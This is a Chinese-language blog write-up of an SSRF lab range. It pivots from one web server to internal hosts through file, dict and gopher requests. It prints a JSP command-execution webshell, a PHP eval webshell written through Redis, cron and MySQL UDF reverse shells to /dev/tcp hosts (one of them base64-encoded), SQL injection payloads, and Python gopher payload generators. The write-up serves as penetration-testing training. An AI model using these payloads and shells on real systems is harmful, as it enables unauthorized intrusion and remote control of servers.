实战 | 记一次SSRF靶场到内网打穿

2022-11-15 16,328

0x0前言


靶场网络拓扑如下

92883-rn4n90qpxcd.png


172.172.0.10 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网,此时攻击者通过公网可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。

大部分源码采用自国光师傅的项目,修改了一两个靶机的内容

https://github.com/sqlsec/ssrf-vuls






0x01 判断 SSRF并获取信息



SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。
下面这个功能点是获取网站快照

69614-tndfk5ot85f.png


正常业务情况是请求网站然后响应内容,但是没做好过滤可以使用其他协议,配合 file 协议来读取本地的文件信息,首先尝试使用 file 协议来读取 /etc/passwd 文件试试看:

file:///etc/passwd

78756-9er4vpqham8.png


然后Linux的话可以通过读取/etc/hosts来获取当前主机的ip

file:///etc/hosts

66142-h369bp33i2e.png


得到当前的主机ip为172.172.0.10 权限高的情况下还可以尝试读取 /proc/net/arp 或者 /etc/network/interfaces 来判断当前机器的网络情况



0x01 172.1720.1/24 - SSRF 探测内网端口


SSRF 常配合 DICT 协议探测内网端口开放情况,但不是所有的端口都可以被探测,一般只能探测出一些带 TCP 回显的端口
burp爆破模块对ip c段跟端口进行选择然后攻击模式选择Cluster bomb

40044-fzx69x100xv.png


第一个位置选择1到255也就是一个c段

42286-43y621vg8r.png


第二个是要探测的端口

88273-cc5dvx1sk0c.png


得到的端口开放信息

25681-yrvg1nsgibb.png


通过爆破可以得到端口的开放情况(开放的可能更多,上帝视角列出能打的):

172.172.0.15 6379172.172.0.2 6379 172.172.0.18 3306172.172.0.59 80,3306172.172.0.25 80172.172.0.50 80172.172.0.10 80

0x02 172.172.0.50代码注入


通过ssrf先请求一下发现了一个首页显示Hello CodeExec

74825-n6nl3eynt1.png


对这个进行SSRF目录扫描

54154-mqsyiz1cr5.png


然后添加目录字典

55186-b57nh5olwi.png


通过长度可以可以看出来存在着 phpinfo.php 和 shell.php:

44623-t42ox9y424h.png


访问一下shell.php一个简单的命令执行

42177-xf9nzxrau3h.png


直接使用 SSRF 的 HTTP 协议来发起 GET 请求,直接给 cmd 参数传入命令值,来命令直接执行:

37588-c1zudcbtp5s.png


查看一下这台的hosts文件

47658-xyvw28zk1b.png



0x03 172.172.0.59Sql注入


请求页面发现是一个查询的功能点

98531-0msr985bbi3.png


通过查看html表单可以发现是通过get传给当前文件的参数是username

89536-z04l3rab9wf.png


查询一下admin

37612-3jcg64kw8ei.png


加个单引号发现报错了

00578-le5kefz9cr.png


存在报错我们直接构造报错注入payload

172.172.0.59?username=admin'-updatexml(1,concat(0x7e,user()),1)-'

33263-471qxtwucgg.png


使用sqlmap

sqlmap -u "http://10.68.1.51/" --data "url="  --prefix "172.172.0.59?username=admin'" --dbms mysql -p url --tech E -v 3 --level 3 --tamper space2comment   -D "user" --dump

成功跑出注入

58166-zw7wz83qjns.png



0x04 172.172.0.25 uploadfile


发现是一个头像上传的功能点

17762-ddqf8o19f7p.png


查看表单可以看到上传到当前文件,文件名是file

70735-zgfaighntf.png


上传是通过 POST ,我们无法使用使用 SSRF 漏洞通过 HTTP 协议来传递 POST 数据,这种情况下一般就得利用 gopher 协议来发起对内网应用的 POST 请求了,gopher 的基本请求格式如下:

gopher://IP:port/_{TCP/IP数据流}

gopher 协议是一个古老且强大的协议,从请求格式可以看出来,可以传递最底层的 TCP 数据流,因为 HTTP 协议也是属于 TCP 数据层的,所以通过 gopher 协议传递 HTTP 的 POST 请求也是轻而易举的。
首先来抓取正常情况下 POST 请求的数据包,删除掉 HTTP 请求的这一行如果不删除的话,打出的 SSRF 请求会乱码,因为被两次 gzip 编码了。

Accept-Encoding: gzip, deflate

接着在 Burpsuite 中将本 POST 数据包进行两次 URL 编码:

26246-5owb0c8lou4.png


两次 URL 编码后的数据就最终的 TCP 数据流,最终 SSRF 完整的攻击请求的 POST 数据包如下:

gopher://172.172.0.25:80/_{url编码两次的数据包}

上传成功

70682-u5t5wertyue.png


请求php文件成功

16485-gwczhq9ficv.png



0x05 172.172.0.42 tomcat-CVE-2017-12615


跟上面一样只是发送的包是put的,准备一个jsp一句话

<%
   String command = request.getParameter("cmd");    if(command != null)
   {
       java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream();        int a = -1;        byte[] b = new byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1)
       {            out.println(new String(b));
       }        out.print("</pre>");
   } else {        out.print("format: xxx.jsp?cmd=Command");
   }
%>

准备攻击数据包,将个 POST 请求二次 URL 编码

24601-6xqebrozkoq.png


通过 SSRF 发起这个 POST 请求

73343-7p4c5l8y6cb.png


接着通过 SSRF 发起对 mo60.jsp 的 HTTP 请求,成功执行了id 的命令:

51451-zjabw0hf75.png



0x05 172.172.0.2 Redis 未授权


系统没有 Web 服务(无法写 Shell),无 SSH 公私钥认证(无法写公钥),所以这里攻击思路只能是使用定时任务来进行攻击了。常规的攻击思路的主要命令如下:

# 清空 keyflushall 
# 设置要操作的路径为定时任务目录config set dir /var/spool/cron/
# 设置定时任务角色为 rootconfig set dbfilename root
# 设置定时任务内容set x "n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1n"
# 保存操作save

未授权的情况下可以使用 dict 或者 gopher 协议来进行攻击,因为 gopher 协议构造比较繁琐,所以使用 DICT 协议来攻击

dict://x.x.x.x:6379/<Redis 命令>

成功执行info命令

85548-oc331nnt29j.png


用 dict 协议来创建定时任务来反弹 Shell:

# 清空 keydict://172.172.0.2:6379/flushall 
# 设置要操作的路径为定时任务目录dict://172.172.0.2:6379/config set dir /var/spool/cron/
# 在定时任务目录下创建 root 的定时任务文件dict://172.172.0.2:6379/config set dbfilename root
# 写入 Bash 反弹 shell 的 payloaddict://172.172.0.2:6379/set x "n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1n"
# 保存上述操作dict://172.172.0.2:6379/save

成功反弹回来shell

59588-jpg6dskjs19.png



0x06 172.172.0.15 授权redis


有密码验证,无法直接未授权执行命令:

41912-4cyhqckeole.png


除了 6379 端口还开放了 80 端口,是一个经典的 LFI 本地文件包含,可以利用此来读取本地的文件内容:

95677-ssuidkqgft8.png


因为 Redis 密码记录在 redis.conf 配置文件中,结合这个文件包含漏洞点,那么这时来尝试借助文件包含漏洞来读取 redis 的配置文件信息,Redis 常见的配置文件路径如下,也有是通过了其他方法拿到了密码比如Spring boot heapdump

/etc/redis.conf
/etc/redis/redis.conf
/usr/local/redis/etc/redis.conf
/opt/redis/ect/redis.conf

成功读取到 /etc/redis.conf 配置文件,直接搜索 requirepass 关键词来定位寻找密码:

32831-d558alvg3pi.png


有密码可以使用dicty验证一下是否正确,但是因为 dict 不支持多行命令的原因,这样就导致认证后的参数无法执行

dict://172.172.0.15:6379/auth P@ssw0rd

61791-nyktgb2ocy.png


gopher 协议因为需要原生数据包,所以我们需要抓取到 Redis 的请求数据包,在本地安装Redis,用root身份启动Redis-server,利用socat 做端口转发并抓取Redis-cli 和Redis-server通信的数据。

socat -v tcp-listen:5201,fork tcp-connect:localhost:6379    #端口转发并抓取数据

此时使用 redis-cli 连接本地的 5201 端口:

redis-cli -h 127.0.0.1 -p 5201

服务器接着会把 5201 端口的流量接受并转发给服务器的 6379 端口,然后认证后进行往网站目录下写入 shell 的操作:

# 认证 redis127.0.0.1:5201> auth P@ssw0rdOK# 清空 key127.0.0.1:5201> flushall 
# 设置要操作的路径为网站根目录127.0.0.1:5201> config set dir /var/www/html
# 在网站目录下创建 shell.php 文件127.0.0.1:5201> config set dbfilename shell.php
# 设置 shell.php 的内容127.0.0.1:5201> set x "n<?php eval($_GET[1]);?>n"
# 保存上述操作127.0.0.1:5201> save

36251-38itnqp75pd.png


57841-yro1c3xjo7p.png


与此同时我们还可以看到详细的数据包情况,下面来记录一下关键的流量情况:
接下来整理出关键的请求数据包如下:

*2r$4r
authr$8rP@ssw0rdr*1r$8r
flushallr*4r$6r
configr$3rsetr$3r
dirr$13r/var/www/htmlr*4r$6r
configr$3rsetr$10r
dbfilenamer$9r
shell.phpr*3r$3rsetr$1r
xr$25r

<?php eval($_GET[1]);?>

r*1r$4r
saver

可以看到每行都是以 r 结尾的,但是 Redis 的协议是以 CRLF (rn) 结尾,所以转换的时候需要把 r 转换为 rn,这里使用七友师傅编写的python脚本

import urllib.parse

protocol = "gopher://"ip = "127.0.0.1"port = "6788"shell = "nn<?php phpinfo();?>nn"filename = "mo60.php"path = "/var/www/html"passwd = "P@ssw0rd"cmd = ["flushall",     "set 1 {}".format(shell.replace(" ","${IFS}")),  
    "config set dir {}".format(path),     "config set dbfilename {}".format(filename),     "save",     "quit"
   ]if passwd:
   cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"def redis_format(arr):
   CRLF = "rn"
   redis_arr = arr.split(" ")
   cmd = ""
   cmd += "*" + str(len(redis_arr))    for x in redis_arr:
       cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
   cmd += CRLF    return cmdif __name__=="__main__":    for x in cmd:
       payload += urllib.parse.quote(redis_format(x))    # print(payload)
   print(urllib.parse.quote(payload))

发送返回ok

75954-tzhgi07j0k.png


发送的数据如下

url=gopher://172.172.0.15:6379/_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25248%250D%250AP%2540ssw0rd%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252422%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Amo60.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

尝试访问,成功

60604-4l410i9z52b.png


也可以通过计划任务反弹shell

65460-iccnp111hfk.png


成功接收到

40947-w5daxlipby.png



0x07 172.172.0.18 未授权Mysql


MySQL 需要密码认证时,服务器先发送 salt 然后客户端使用 salt 加密密码然后验证;但是当无需密码认证时直接发送 TCP/IP 数据包即可。所以这种情况下是可以直接利用 SSRF 漏洞攻击 MySQL 的。因为使用 gopher 协议进行攻击需要原始的 MySQL 请求的 TCP 数据包,所以还是和攻击 Redis 应用一样,这里我们使用 tcpdump 来监听抓取 3306 的认证的原始数据包:

# lo 回环接口网卡 -w 报错 pcapng 数据包tcpdump -i lo port 3306 -w mysql.pcapng

然后本地使用 MySQL 来执行一些测试命令:

[root@localhost]# mysql -uroot -h127.0.0.1 -e "select * from flag.test";
+----+----------------------------------------+| id | flag                                   |
+----+----------------------------------------+|  1 | flag{71a5d5e6b2b9a3da3dc0a85851d50316} |
+----+----------------------------------------+

Wireshark 打开 mysql.pcapng 数据包,追踪 TCP 流 然后过滤出发给 3306 的数据然后过滤出客户端发送到MySQL服务器的数据包,将显示格式调整为原始数据即可:

81830-ph696qxna6b.png


然后使用如下的 Python3 脚本将数据转化为 url 编码:

import sysdef results(s):
   a=[s[i:i+2] for i in range(0,len(s),2)]    return "curl gopher://127.0.0.1:3306/_%"+"%".join(a)

s="3c00000185a20f0000000001210000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f726400210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d69742031180000000373656c656374202a2066726f6d20666c61672e746573740100000001"print(results(s))

24171-mtqdgl260f.png


放入到 BP 中请求的话记得需要二次 URL 编码,成功查询到flag

58024-tt42tmq7t6.png


使用脚本
h
ttps://github.com/tarunkant/Gopherus
来生成查看插件目录的exp

show variables like '%plugin%'

68975-xvvhp60qkmg.png


放入到 BP 中请求的话记得需要二次 URL 编码,可以直接获取到MySQL 的插件目录为:/usr/lib/mysql/plugin/

65732-78d6fypudjx.png


使用国光师傅的网站https://www.sqlsec.com/udf/

28659-bz3i179vexm.png


然后用脚本生成上方语句的payload,写入udf文件,,这里的操作我使用脚本没有完成功要使用tcpdump 监听到的原始数据后,转换 gopher 协议,BP 二次编码请求一下

69880-6soey76z242.png


创建自定义函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

最后通过创建的自定义函数并执行系统命令将 shell 弹出来,原生命令如下:

select sys_eval('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xNjYvNTU1NSAwPiYx|base64 -d|bash -i');

0x08参考

https://www.cnblogs.com/aninock/p/15663953.html
https://www.sqlsec.com/2021/05/ssrf.html


作者:Jun

文章来源:blog.mo60.cn

如有侵权,请联系删除


本文作者:HACK_Learn

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/191048.html

Tags:
评论  (0)
快来写下你的想法吧!

HACK_Learn

文章数:142 积分: 323

微信公众号:HACK学习呀

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号